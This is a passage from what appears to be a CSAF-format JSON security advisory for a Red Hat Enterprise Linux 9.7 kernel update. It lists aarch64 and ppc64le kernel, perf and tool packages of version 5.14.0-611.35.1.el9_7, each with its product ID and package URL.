"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_id": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@5.14.0-611.35.1.el9_7?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
